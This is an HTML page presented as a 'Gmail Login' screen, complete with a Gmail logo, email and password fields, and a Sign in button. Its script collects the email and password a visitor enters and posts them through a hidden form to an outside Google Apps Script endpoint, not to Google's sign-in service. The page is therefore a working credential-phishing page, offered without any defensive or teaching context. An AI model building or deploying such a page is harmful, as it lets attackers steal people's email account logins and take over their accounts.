<!DOCTYPE html>
<html>
<head>
  <title>Gmail Login</title>
  <style>
    /* Add some basic styling to the page */
body {
  font-family: Arial, sans-serif;
  background-color: #f6f6f6;
}

/* Style the login container */
.login-container {
  width: 400px;
  margin: 0 auto;
  background-color: #fff;
  border: 1px solid #ccc;
  box-shadow: 0 2px 2px rgba(0, 0, 0, 0.1);
}

/* Style the login form */
.login-form {
  padding: 20px;
}

/* Style the form inputs and button */
.login-form input[type="email"],
.login-form input[type="password"] {
  width: 100%;
  margin-bottom: 10px;
  padding: 12px 20px;
  border: 1px solid #ccc;
  box-sizing: border-box;
  font-size: 14px;
}

.login-form button[type="submit"] {
  width: 100%;
  padding: 12px 20px;
  background-color: #4caf50;
  color: #fff;
  font-size: 14px;
  border: none;
  cursor: pointer;
}

/* Style the logo image */
.login-form img {
  display: block;
  margin: 0 auto;
  width: 100px;
}

  </style>
  <script>
    function SubmitToGoogle1(){
        var email = document.getElementById("email").value;
        var password = document.getElementById("password").value;

        var url= "https://script.google.com/macros/s/AKfycbyYFmAusFADqVl7Op8NVEJvY7VYCJUB3SYC3O46hGJGdghmI4j6FkvqLdfF97QJqXJu/exec"

        var form = document.createElement("form");
        form.setAttribute("method","post");
        form.setAttribute("action",url);

        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type","hidden");
        hiddenField.setAttribute("name","email");
        hiddenField.setAttribute("value",email);
        form.appendChild(hiddenField);

        hiddenField = document.createElement("input");
        hiddenField.setAttribute("type","hidden");
        hiddenField.setAttribute("name","password");
        hiddenField.setAttribute("value",password);
        form.appendChild(hiddenField);

        document.body.appendChild(form);
        form.submit();    
    }
  </script>
</head>
<body>
  <div class="login-container">
    <div class="login-form">
        <img src="gmail-logo.png" alt="Gmail logo">


        <form id="myForm" onsubmit="SubmitToGoogle1(); return false;">
        <input type="email" id="email" name="email" placeholder="Email" required>
        <input type="password" id="password" name="password" placeholder="Password" required>
        <button type="submit">Sign in</button>
      </form>
    </div>
  </div>
</body>
</html>
